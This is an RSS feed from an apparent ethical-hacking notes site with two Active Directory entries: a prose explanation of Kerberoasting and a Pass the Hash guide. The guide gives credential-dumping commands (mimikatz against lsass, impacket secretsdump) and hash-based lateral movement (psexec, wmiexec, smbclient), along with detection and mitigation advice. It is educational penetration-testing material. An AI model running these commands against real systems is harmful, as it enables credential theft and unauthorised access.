<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>notes on ethicalhacker.tech</title>
		<link>https://ethicalhacker.tech/notes/</link>
		<description>Recent content in notes on ethicalhacker.tech</description>
		<generator>Hugo</generator>
		<language>en-GB</language>
		
		
		
		
			<atom:link href="https://ethicalhacker.tech/notes/index.xml" rel="self" type="application/rss+xml" />
			<item>
				<title>Kerberoasting</title>
				<link>https://ethicalhacker.tech/notes/kerberoasting/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/kerberoasting/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Kerberoasting is an Active Directory attack that allows any authenticated domain user to request Kerberos service tickets (TGS) for accounts that have a Service Principal Name (SPN) set. Those tickets are encrypted with the service account&amp;rsquo;s NTLM hash, meaning they can be taken offline and cracked without any further interaction with the domain controller.&lt;/p&gt;&#xA;&lt;p&gt;The attack is particularly effective because SPNs are often set on service accounts with weak passwords, and requesting a TGS is a normal, logged operation that blends in with everyday traffic.&lt;/p&gt;</description>
			</item>
			<item>
				<title>Pass the Hash</title>
				<link>https://ethicalhacker.tech/notes/pass-the-hash/</link>
				<pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate>
				<guid>https://ethicalhacker.tech/notes/pass-the-hash/</guid>
				<description>&lt;h2 id=&#34;what-is-it&#34;&gt;what is it?&lt;/h2&gt;&#xA;&lt;p&gt;Pass the Hash (PtH) is a technique that uses a captured NTLM hash to authenticate as a user without knowing their plaintext password. Because NTLM authentication uses the hash directly as a credential, an attacker with a valid hash can authenticate to any service that accepts NTLM — SMB, WMI, RDP (in some configs), and more.&lt;/p&gt;&#xA;&lt;h2 id=&#34;requirements&#34;&gt;requirements&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;A captured NTLM hash (from mimikatz, secretsdump, or similar)&lt;/li&gt;&#xA;&lt;li&gt;Network access to the target&lt;/li&gt;&#xA;&lt;li&gt;Target must accept NTLM authentication (most Windows environments do)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;attack-steps&#34;&gt;attack steps&lt;/h2&gt;&#xA;&lt;h3 id=&#34;1-obtain-a-hash&#34;&gt;1. obtain a hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;1&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# dump from lsass on a compromised host&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;2&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;mimikatz &lt;span class=&#34;c1&#34;&gt;# sekurlsa::logonpasswords&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;3&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;4&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# remote dump via impacket&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;5&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;secretsdump.py domain/user:password@10.0.0.5&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id=&#34;2-authenticate-with-the-hash&#34;&gt;2. authenticate with the hash&lt;/h3&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;1&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# psexec with hash&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;2&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;psexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;3&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;4&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# wmiexec&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;5&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;wmiexec.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;6&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;7&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# smbclient&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;ln&#34;&gt;8&lt;/span&gt;&lt;span class=&#34;cl&#34;&gt;smbclient.py -hashes :ntlmhash domain/administrator@10.0.0.10&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;detection&#34;&gt;detection&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Event ID &lt;strong&gt;4624&lt;/strong&gt; logon type 3 (network) with NTLM authentication where Kerberos would be expected&lt;/li&gt;&#xA;&lt;li&gt;Mismatched workstation names or unusual source IPs for privileged accounts&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;mitigation&#34;&gt;mitigation&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Enable &lt;strong&gt;Protected Users&lt;/strong&gt; security group — prevents NTLM auth for member accounts&lt;/li&gt;&#xA;&lt;li&gt;Disable NTLM where possible via GPO (&lt;code&gt;Network security: Restrict NTLM&lt;/code&gt;)&lt;/li&gt;&#xA;&lt;li&gt;Use &lt;strong&gt;Credential Guard&lt;/strong&gt; to protect lsass from memory reads&lt;/li&gt;&#xA;&lt;li&gt;Enforce tiered administration to limit where privileged hashes are cached&lt;/li&gt;&#xA;&lt;/ul&gt;</description>
			</item>
	</channel>
</rss>
